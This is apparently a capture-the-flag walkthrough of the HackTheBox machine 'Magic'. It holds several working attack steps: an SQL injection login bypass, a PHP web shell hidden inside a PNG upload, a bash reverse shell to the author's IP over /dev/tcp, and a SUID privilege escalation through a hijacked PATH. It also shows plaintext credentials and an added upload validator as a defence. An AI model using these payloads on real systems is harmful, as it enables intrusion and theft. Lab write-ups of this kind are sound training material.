Magic
Magic is a Medium-difficulty Linux machine from HackTheBox created by TRX. The machine is well designed and not complex: you don't have to search every corner of it for clues. In this post my IP is 10.10.14.18 and the target's IP is 10.129.44.173.
Gather Information
First of all, let’s start with a basic scan.
nmap -p- --open -T5 -v -n 10.129.44.173

nmap -sC -sV -p 22,80 10.129.44.173 -oN Target

whatweb http://10.129.44.173

Browser: http://10.129.44.173


Browser: http://10.129.44.173/login.php

Here we are going to try two login combinations, a default password and an SQL injection: {admin : admin} and {admin : ' or 1=1 -- -}. The second one gets you in.
Browser: http://10.129.44.173/upload.php

Exploitation
We can upload files, and we know the directory /images/uploads/ where an uploaded image can be visited on its own (you can test it if you want), so first we will try to upload a PHP file.
vi test.php
<?php
echo "<pre>" . shell_exec($_REQUEST['cmd']) . "</pre>";
?>
With that file in place, appending test.php?cmd={Command} to the URL of the uploaded file would let us run commands on the machine.
Browser: {Upload test.php}

The upload check is based on magic numbers: the file is recognized as a PHP script and rejected. Knowing this, we will take a PNG file and append the PHP code to it.
Browser: {search and download a png file}
mv downloaded.png downloaded.php.png
vi downloaded.php.png   # append the PHP code from test.php after the image data

Browser: {upload downloaded.php.png}

Browser: http://10.129.44.173/images/uploads/downloaded.php.png?cmd=whoami

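The filter on this form trusted the magic number alone, so a genuine PNG with PHP appended and a double extension passed. As an added example (not code from the post or from the machine), this Python validator shows the defensive counterpart: it accepts a file only when a single final extension, the magic bytes and the file body all agree it is a plain image. The sample bytes are constructed for the demonstration.

```python
import re

# Constructed sample inputs (not from the original post): a minimal PNG header
# and the kind of PHP snippet the writeup appends to an image.
PNG_MAGIC = b"\x89PNG\r\n\x1a\n"
PHP_SNIPPET = b'<?php echo "<pre>" . shell_exec($_REQUEST["cmd"]) . "</pre>"; ?>'

# Magic bytes for the image types the form is allowed to accept.
MAGIC = {
    "png": PNG_MAGIC,
    "jpg": b"\xff\xd8\xff",
    "jpeg": b"\xff\xd8\xff",
    "gif": b"GIF8",
}
# A PHP open tag anywhere in the body turns a valid image into a polyglot.
PHP_TAG = re.compile(rb"<\?(php|=)", re.IGNORECASE)


def validate_upload(filename: str, data: bytes) -> tuple[bool, str]:
    """Return (accepted, reason). The file is accepted only when the name,
    the magic bytes and the body all agree that it is a plain image."""
    name = filename.replace("\\", "/").rsplit("/", 1)[-1]  # strip any path
    parts = name.lower().split(".")
    # 'downloaded.php.png' splits into three parts: reject multi-extension names
    if len(parts) != 2 or not parts[0]:
        return False, "filename must be name.ext with a single extension"
    ext = parts[1]
    if ext not in MAGIC:
        return False, f"extension .{ext} not allowed"
    # The magic-number check alone is all the vulnerable form relied on
    if not data.startswith(MAGIC[ext]):
        return False, "magic bytes do not match extension"
    if PHP_TAG.search(data):
        return False, "PHP tag embedded in image data"
    return True, "ok"


if __name__ == "__main__":
    for fname, body in [("downloaded.php.png", PNG_MAGIC + PHP_SNIPPET),
                        ("cat.png", PNG_MAGIC + PHP_SNIPPET),
                        ("cat.png", PNG_MAGIC + b"\x00" * 32)]:
        print(fname, validate_upload(fname, body))
```

Storing the accepted file under a server-generated name with the validated extension, in a directory where the web server does not execute scripts, closes the remaining gap.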
Now we are going to get a shell on the machine; for this we need a local terminal and the browser.
nc -nlvp 443
Browser: http://10.129.44.173/images/uploads/downloaded.php.png?cmd=bash -c 'bash -i >%26 /dev/tcp/10.10.14.18/443 0>%261'
Remember: when passing commands in a URL, every '&' must be written as '%26' (URL encoding).


Ok, we have to find a way to become the user theseus. Our first option is to explore the files of the website.
cd /var/www/Magic
ls

cat db.php5

ssh theseus@10.129.44.173 #Fails
su theseus #Fails


mysql   # the mysql client is not installed

mysql   # press TAB to list the mysql* tools that are available

mysqlshow -u theseus -piamkingtheseus
mysqlshow -u theseus -piamkingtheseus Magic
mysqlshow -u theseus -piamkingtheseus Magic login

mysqldump -utheseus -piamkingtheseus Magic

su theseus #Pass: Th3s3usW4sK1ng

cat /home/theseus/user.txt
Privilege Escalation
cd /
id
sudo -l

find / -perm -4000 2>/dev/null

ls -l ./bin/sysinfo

We need to know how the sysinfo binary works; with strings we can inspect the whole program.
strings ./bin/sysinfo

So, we have to find where the fdisk command it calls is looked up ($PATH) and change the path priority so that a fdisk file of our own is executed instead.
which fdisk
echo $PATH

Now we are going to create a new fdisk and change the PATH to read ours.
cd /tmp/
touch fdisk
chmod +x fdisk
export PATH=/tmp:$PATH   # check the result with echo $PATH
which fdisk

nano /tmp/fdisk   # contents of our fdisk script:
chmod u+s /bin/bash
bash -p   # after sysinfo has run our fdisk, start a shell keeping the root privileges

cd /root/
cat root.txt
